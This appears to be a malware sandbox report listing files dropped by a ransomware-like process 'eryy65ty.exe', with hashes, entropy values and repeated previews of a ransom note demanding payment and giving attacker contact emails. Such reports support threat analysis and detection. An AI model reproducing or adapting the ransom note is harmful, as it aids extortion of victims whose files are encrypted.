                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8779163291921135
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:GRmXuPrGgPuLBKo/Wq7U7ktHmJ2+M+AKQS/m0WfyNi+C2nCTeexWrHU3I13CeXkR:GQXuCPD/WwWkIJ22AHS/m0p81MmxWr07
                                                                                                    MD5:5298454CB15F45A47E7D43E2801BF309
                                                                                                    SHA1:611DFAEF362DCE208FB22D1117C53F6918270F7D
                                                                                                    SHA-256:EF8665C5D679455D189F06F2F02D79C17CA655D1CC27D5529DEA64F8C8186F04
                                                                                                    SHA-512:3720FC31DD9E20F18E9021835AC65E05CBFB239B4095B8A932B4076899CCFF7BE18C26560E176D02BDD5B4C2BBF71807BC313F56B8BC917236412776BCAFF474
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8602961189220775
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:6zwRXESBZpj9OyVcu041lHJa7SyIF9VeDZCs2yRP296giqsIV:Y+XJpZOOcuXLJaWhQos2E29x4IV
                                                                                                    MD5:6FEBF278C1FED9970095B05CAFB823FB
                                                                                                    SHA1:30C8DD221444331CAF19E4B93D8A866D9629674A
                                                                                                    SHA-256:9B4AD827CD778F1504E00F63D11A1EC7B029B89A250F1363A2E492CB06B667BB
                                                                                                    SHA-512:9B603E828C5AC1B75ACB4794F1B92D6BE200CBF34074FACD6232179B48691661E861BF207FDCC03AE49E55E9C9188A7CC39890B9C295C1C5948A1C626ED1805C
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.852925727284638
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:VO6D4TqnwXopYs+lme0eI9543F0gqortQW4R3O6KJUsbjUOMdw+ZpqIyXbEnLNdE:VO6D7nAmjs6giJw7JFbodDMfXbKLg
                                                                                                    MD5:9AE791B3AE03B43B9FF73CA942B0A9AF
                                                                                                    SHA1:BF75F3391D154611C4DF213B5EF74A69955E946B
                                                                                                    SHA-256:BDB504C510EE02CCC47E014F95C0128F64BD215B6F08404036F9A1FE03790038
                                                                                                    SHA-512:4620068CB4FC774C6D317637BE6708E2F9F00CEFF46A500BD97A1AB9BCD1D65232DD6212F00DDBF67244AEF5DBD72F6834E95F54FF26EE783CE53E213BD1D462
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.845632329118307
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:SiaCqsA0fxyzgp9pFeatUB5o/3qdgXGvXp34l0vl3lmUj8TItaKw+WATl5VIs7DG:Sia255yzgp9+X5EYv5IQllahmdIs7DG
                                                                                                    MD5:3ABA54949E330F54A65B308D596478FC
                                                                                                    SHA1:511FE569F063DA12A554C089A9C029218B5B336A
                                                                                                    SHA-256:FA982C3170ECF62F606985206F671F1AAE335B8383E32A4782B2E885A4D8FBF1
                                                                                                    SHA-512:EF21EDD76CC82C9D656B49787B76AC689CB4B2AAF5B33F19C7E0B7BA9CA3AB16F5DCA56277149E3494DA4330C0C06D35642FA162D556F750CC3E1D5F56318CC1
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.818360660484917
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Fh7exz7HpsQArufPAUDdjBs4GChZTBBMyt/rKI8FO6jshSWmTxqMB:j7e1jiRrufP/djBTjF/wIIO6AZmNqS
                                                                                                    MD5:5FC96BD03F23C6CC1AA6CCE4BF488AD9
                                                                                                    SHA1:221C58A6694E7014BFBE7E3A95D0D8203D942A09
                                                                                                    SHA-256:F35C17E7FF346A9AC09F0EE51E6311D9F8AD010338E9AB47937B953CD587FA28
                                                                                                    SHA-512:E53262785739C30FCEAA28DD1A09C46A82E00292D79212DCF0BBF1611381D5A7DC867F9029F76037E9F43A9844D93797A7655527192D70E222F1EFFADA3A2BA9
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.851307489579351
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:wqFZUEpJhHKhOytNpNf930DbCQvmwLTfi9gjImflBWggd3EWJZEMdMQwpzRnU3:wqcEpJhHcOmfxtQvmwLGKj6+Me/zhU3
                                                                                                    MD5:3BA9F5575A51AF2B4C6C0432FC436680
                                                                                                    SHA1:B90BB6CECAD23834144A9E0FA4C8CEF83721D831
                                                                                                    SHA-256:23DCDD1191D53D649049A625BBF9EE4C358AF71313CC2BF484C972FAFB0E10BC
                                                                                                    SHA-512:57D68377EFD8BB87A35FF6E958947A22D72EC5D45D767EE885529848714F6A1A973349D6154FD6B2512A7AE59A9DCCB1215631E4B9930995BA22636299507491
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.867710893738655
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:4Nk+lEvYs1Z79wpEWv5KQqY3Vk4mSGBqVnWM1nQPGckBNjjsjNA4sUoz4jiKIcrE:PMEvIEo5rqYm4mSMucKAjQd4HIoP9S
                                                                                                    MD5:2613EF0A8BE8245F71B6340B151589CE
                                                                                                    SHA1:251925583CD3DBCB001416C6467B7D3138B82461
                                                                                                    SHA-256:33A661F270D881802E9CDDEB124F6583ED77B3ED8A02EFFD6BA1A045AAACED3F
                                                                                                    SHA-512:8ABF1F5303EAC05942D93F8BC7AB81E6AD5F6AFE4E8601BCB159A40FD1D2A4FC091E429AD33928800E2E8C7C395FFBC86D5447646E2E62AE6EE62286201A3525
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.818660714272044
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:lMmckU3p6cM8Zl1yCLc1qXGWhot0j5Y/Xda/F4lHueGPc0A:lMVkQp698ZlACLckct0j5Y/XdKWOLS
                                                                                                    MD5:6088A907618BEA8E578BD0684C717FF3
                                                                                                    SHA1:A9E5CFB23F00373B16D388D5AD8C0A3CD78AC8C1
                                                                                                    SHA-256:FC777E342BFA26E3DA892ED42A4805C863DB2F376C2CCB0AE932361B511CBA4B
                                                                                                    SHA-512:A46B76664B77DD1F1DA1992E756FFE8F24EB5C27030FCB38D77E20DA64D20E56DD0C0971AE59294E74DD4CD529424CE2EBA273317E982C6D2E65733845B6640B
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.872035993122395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:mQyRkYQSDh2vYvQoSfxICWAUxfYm/iTZBbEWIfGSe7ITIBq0CaLxwmdYYSEsV:mHkYloZoSIfNxgmiT3EVGDc0BIaLxvGd
                                                                                                    MD5:130EBF456029F798C405C8073A9D6CCC
                                                                                                    SHA1:5D83E878696F932116D01D52D25700E8D7CCB38C
                                                                                                    SHA-256:D4E2182B168FF19F84D708848C5909AF69BA1BDA7551DD69E4C26A545CFBDB6C
                                                                                                    SHA-512:9AB8825C67F4C2141CF8D77BA13BDE989E385D14EA71CF3B4B31730E1259094BAD071AF5CC7CE933026F546764810B375AC9434E3A3A1AE049435EA0783F084A
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8514006558891225
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:tDtQvrusG7/hWtGdRVheMQniApWvPIUtV8DQDiz8+k0ap+8h8xJo:tDtQvrjQhVhe7iYUt+8mz7kjp+hJo
                                                                                                    MD5:229AEA16EAD91A1B728454148D32E6FE
                                                                                                    SHA1:69265F077E7163DAB7E5327CECDDD1EB56421482
                                                                                                    SHA-256:408CF5CFF1065DDDA06B7289B7E235335FE58A5BD13957FF5DABD74A8AB01218
                                                                                                    SHA-512:FD0D2A78DCCC07A5B4A1E138193E5133553731FC5E3BED40D93A951D6B80F613BD1D53C3636B4A5E3788ECEEC1435069993402004FB9CFFB37B42D611D045550
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.863467703958777
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ARcKfz67D4I0dScUUpm0QL8ooWLFwwoVex8Or+pjdiL/5Fmd5QhLhaCHzACi03LW:56smd630QLlRxxx8zjdied5+UCtK
                                                                                                    MD5:37CEA45B416A3165BAC4515D4E2442EE
                                                                                                    SHA1:8A23604413A960C46B46EFECCD02D836185CC77D
                                                                                                    SHA-256:B4909790D9A0951C65EC8250826429CC521F6A78C5BFACF1084A1D1884AE56EE
                                                                                                    SHA-512:1A24E80CB779E103E383152D3E2854E100640BE557DC6062850F4106C50EB81181455C4BC1EB7CF8F041D9E9F3DAAD0203E28E4EC0C442EF9DAE491E31C70EC3
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.845816159726413
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:svWdhlf/GR/f58OKhRmrGpucCikgTsrIB9Uvi057lb558:svKhlf058OumrjikTIB9PMH8
                                                                                                    MD5:0EC128C2CA71F20EDB4C90E2775CA5FF
                                                                                                    SHA1:5A8997D57C52CD20B55AD97F0C55A7494F1D37D4
                                                                                                    SHA-256:05A515FFB5903C85C2AD92AE20E1E479DE572DD07298A76A48554BEA783DA703
                                                                                                    SHA-512:93C1304E8533ADE34DDDA8C22304582B4434573BD3184983E14233FED9D5D1180CE251B99726F4FC21605E1670EAAAB2CAE4650D3C1A240DF3128023AEBB91B5
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.844330276297276
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:sYsHIW7cMhmnj1m+F0y/GwlZWHKHLqY3Ykb85UBzG2LFsrTkohx:sYsH1A14KGwloqLqeZsrNhx
                                                                                                    MD5:7349563D84716F9037A82CAA46B6CD69
                                                                                                    SHA1:9DE46038D67925A3634A003D3B87EFEE50C1A199
                                                                                                    SHA-256:517BD3763597F523783EA3996805F9A7D6819F7715F7A741D62FE2C983BCAE34
                                                                                                    SHA-512:7458EB9D18D815FEEE429CB83C499187F0637C8E83F09A66B6C6EB2EBB9065CAC511D8ECC31A6568D0867A9FA1A197C83244D943AE83C91FFC09CF3C396852A0
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.847495273112487
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:vM48Vmj3AGOWxyoRKDirAaxlTn7F0ASC0hjT6xTvQUdg5rf:UjMQ2T1nT7RVkj6vc5b
                                                                                                    MD5:17C4B13574D67B2CA57BDD13FE1C1FFA
                                                                                                    SHA1:0DFFB8E0917EDE9D4AC14AD9391583C2D28D4982
                                                                                                    SHA-256:41FF15BBD7993BF08A71547AE4541D50B9C3733550B34226CD57335C2606FFB1
                                                                                                    SHA-512:7411B09ED76C1516D09C0333EA4CBADC4D350516669F8541E51FE803C7C752CAECBF4C524CF3896C93591CF8C8206294B6D3844F5E61BC7B65D36670193FCE82
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.859478898677655
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:vcBLIw14nJyc1WPFbWI6cy9Nec7Z/bW3qnVtgGti/Bm:7ZpasI8Le0Zy4iJm
                                                                                                    MD5:2E6F156436F5C572E7818F46A9C21E0D
                                                                                                    SHA1:9EEC03741442F6DB66B4E28205AFFE2A9A47A72E
                                                                                                    SHA-256:464E9B97DC3BAC275AA803A8F6F508C7F97F0613E84BBF5A8502561D1A957F96
                                                                                                    SHA-512:FB10DD69A43EDDA3A3C4A97AB07D1FE9EFE7925A6961CC6583F4EF52CBC269F0ABAC83165FF820C8609B913402DBFED9395A52D332F79D83BF524F8667FB27BF
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.832219858022259
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:NlC96IPmENo31O/V/sQ71LGPml0yi2rO3P7eEwlEvWbMT+YgS:W4co3A9/nEA0b2C/7ElaWbMCYgS
                                                                                                    MD5:2245755A63295C57C7D0E199AE658649
                                                                                                    SHA1:64A72C616E9F096982ADF695AD02EB0FE503FEF7
                                                                                                    SHA-256:56B73DB370F136990487443E793DB46B81CE659F2D7A15932E5A33619632DB51
                                                                                                    SHA-512:E6C783AE334DA77292C8D62C7CEF9C1FCA3B6D86C239612FC7C47F03C7EA826333DB76F504C735A8AA53F82B7F131B2068B5838272FCF715381ABECEEA078B28
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.82741782815742
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:C8sncKgsOqhDk/XgCDh2tmfVwJxGDRW9sfjqEMF6aTAmuXGcpD3E67S2lWsJjN:C2KgsBhDkYCDgB6eqaTAlZD3tVTjN
                                                                                                    MD5:9941AA79C15554AFA9E0E04A08BD0170
                                                                                                    SHA1:5A106A9B8D28439CBC023854E5D2EB43A7654C21
                                                                                                    SHA-256:481C19F552C1E011F2C6829BBE33C03E9A4D5F7C73CFD4B6C22BED890033916E
                                                                                                    SHA-512:14E65043338051201097E3B85686D772B5B3E8AF89D7A4A98566D01C13F8A370F736297E4CBC0B3F0549B64722D9B187358C2D216BB58AF903A87E059BFC81FE
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.837728386342759
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:dVQtAoPjD4O0+U2bTpnNK+sQ2UME79uKs3fwoQpq90USNi1Q65YwTOQzp52ABpjF:zQthU2JhD2D4XEaMvwiSQROQt5B+u0w
                                                                                                    MD5:96A2C76FE22B5CEAC09A196993B2CC16
                                                                                                    SHA1:17130CD64D5DFD4EDA70AA532420A52155235880
                                                                                                    SHA-256:1647F3684592554FE4112B10F159F9EE39E1D998DF6166422B476903EB8B8701
                                                                                                    SHA-512:E570C66F5BDB16A10B8E0D8FEBDC8CD331C43A9E781F8909214E56D241CDA83E4AB4FED0E8A567D3EFC5AC7C3D40035E7283A0AA317439D6DCC6AF8A67840BF7
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.857354360515867
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:dcdohFLpxBJDQBG+ab19Pg3mz1wT/5DO9DJY7j/aJmzDs0hNAXTdqRwx5jB9vs:dDBeA+abAWxwT/5DGD+7jigDsksGwI
                                                                                                    MD5:CB87AD6E5D0B0B8C75B3961C42B3DA9B
                                                                                                    SHA1:8D7BAA1EAF1209EE7550B964D4F832317EB4E5F2
                                                                                                    SHA-256:579DF8D7D8CAB4A9632B6D3258F55EA90EB7FA986419153EEA962BBCF2726810
                                                                                                    SHA-512:1F21920EE6FFE148C4F8B417893B41072527B75A41E1EB5A43AADC44C873AA7C3F579F5C94BA50BB7358419C93479BF783BF1C28797CF848596E83E36FE29952
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.854545040352736
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:bs+kw9pSkQqzHxg9ZL16p81Ckp3jq4Ch3IM5Aa8LIJ6fboUBVcy:pkw9pSk9Re1x1t3jlo3IfazJ6fkU3
                                                                                                    MD5:B32648B246E3DA42CCA20117FB85676E
                                                                                                    SHA1:A3289362B1AD1883E20CD0002B021A926F3F85DF
                                                                                                    SHA-256:16E735C9D6FD0002C8AEB77604926442C55611144FFF3E44F0A357AF7800AF9A
                                                                                                    SHA-512:DB84BADBF730BBA233598FD97F5278EFAB004B951CF17165D14F983C6B9ABDE76D33029FB2EF74E11820020CD13E3E3D995D9484083DD261F239F9F99F66570B
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.84432465930802
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:57ZDS936FXKVd8/B4O9ustnTq3B195WMcC+gGy6ImpZOo0JnSc4E0k1:3Y30aVk42nTqHujy6Ia84Jk1
                                                                                                    MD5:A18C80B24A1FC99E90FD7142C7ED1C7F
                                                                                                    SHA1:BCEB609F7FEFFF412B5DEE487F9268A03C38F96C
                                                                                                    SHA-256:E2BD32453E9A522FD3023937E2CBFF458B412298D436A8E28376EE103D054A80
                                                                                                    SHA-512:142A9D6D01BA0E49776F67585B7372EBDE0A5EE8E4F6F0E37E380F67FD9F43A58D36F38951BF01F6B43643E4BA788B9D476F77D72AB84C953476B4A603DF84DA
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8570715347573685
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:llGinjjy9HvX114tyfa7lLvIlY2ot0KZ+XOaJqOBKPsSc6PD8ZNx:llDa9tk22lLvz2vSU4OyEP
                                                                                                    MD5:E47B42EC3E3C61BB44731AF9C019CA29
                                                                                                    SHA1:525DC62BCC63A770C1402818D873252FF5469354
                                                                                                    SHA-256:B6F73CDA292D23E9D23CB8EACD75F2CC6EA08668874F66C9B4A900DF1010E715
                                                                                                    SHA-512:CD4900665D6D266E0EC31E62969523269C9A0CF1DE543673037B9CF4039ED92C0DDF158D61C6BE2EDE544815C12AC35EA112DC3590019D8E6A174D2EFA76BB98
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:PGP Secret Sub-key -
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.871038957989256
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gCJBn08W5N4zP1YpK2niL5j3mgSumW/mL3YteThMNxASPc5zZVu9ucYM3Vvo3CHl:Nh9WfC9Yk2niL5Tm/7qYtZc9ucnV8C8K
                                                                                                    MD5:BF6B0D1C683E1C7442D663F5E67BD39D
                                                                                                    SHA1:6BF9299F79B7F7F318D9B98B7630161B5C4BC8B1
                                                                                                    SHA-256:0BBAC439EB87637FC5C095CE6182E1EF1FBED4FE04F06E61637C5F3EE9DC0226
                                                                                                    SHA-512:5C284BD04F73525E6C3FE9FD771A71D8FE5E91A00E284191E4021122EFF32C3A2179D6428CBB3FEA8E193905DC30AA424A074F221CF6A2860F5295DF19190019
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.837879838773927
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:3GOgpSTcdYnI5iAu7719Cvzt9snXsQQDb3rks3xDxl4ktZlw9x:W0cenmih7up9M8QAbbkar4KZCP
                                                                                                    MD5:041212AEEB08C87D57B7594C5378893A
                                                                                                    SHA1:59919D7681C63495FD6FB791B4ED116811A47E9D
                                                                                                    SHA-256:7CEC9B98ED16BD528D4BDF814BED61696DFB6AFF12190C3BF7185EA760A587DD
                                                                                                    SHA-512:77C4D9F43899CFE76AE527CEB9051AA5375B576E1A1EBF9064318A61DBBA0D871AF0ADF34417325A4B6F078E56F8FE38E68D134C4CF3D6FC00ED8EEF2DC3D3E3
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.856507962449205
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Vd6+KLDK5/Ywtk+cBwfnWut5MPsDKTCu1UrPZJ/jXTvU+DTSd7R:+uPkVBi3DKMTfnOd7R
                                                                                                    MD5:90D857A27BB7CFE17429330C1F621C9E
                                                                                                    SHA1:F2F1B5F0CC5B6B6888D29B423CCB4D2554757617
                                                                                                    SHA-256:A05FB81C9A4C0C90424CCDB850BFFE4DE35D6B0CCE9C6AE36140DCBC35739814
                                                                                                    SHA-512:C6AEC7E12BC7BAF374EB15DD1707E95F1F63CF7802BE21CC04BD1D94B007AA59A59E8E4055C2042413FCF2A4779D52BBCB45DF4A5263624F34FBDD3058698C73
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.860964748134216
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:nFe1TKLY4LT0t/B1Y0277abKet0y+IiGTNnRylJEkWNe+dVWkj5ul0WIib+OLuH:FsiTuPjKlykWQiVl+KH
                                                                                                    MD5:5C9B7C07034B4CE9A6FC4584480BEC47
                                                                                                    SHA1:C695C86FD767921B5E3993A07CAB2FE6CD40E8D8
                                                                                                    SHA-256:5B457CF5BF5C0886AE8FFE429C815076C5226B44A3786AF463DB2BAB9E214A4E
                                                                                                    SHA-512:A0EBC46ACF58E3625EA9F33AE8976A3BC90FF81EF4EAD09BFA31CA40F801C793EBB52D317991CDE4F4AE9EDADD527538D1C9872AEB434944A1B4BDABDFD687A4
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.857861461657315
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:5u10i5AOorkX8L1orqsyVvQ0ba1b4+Fhi01U5WBB0AretlkXc:5Y5TMB8qfBbG4+WbyB/Kv1
                                                                                                    MD5:50EF66993596BB5F0AF20E0C27E1829F
                                                                                                    SHA1:ACFD5E29B3207B3E08B3C0579C8F4B1A1BF58582
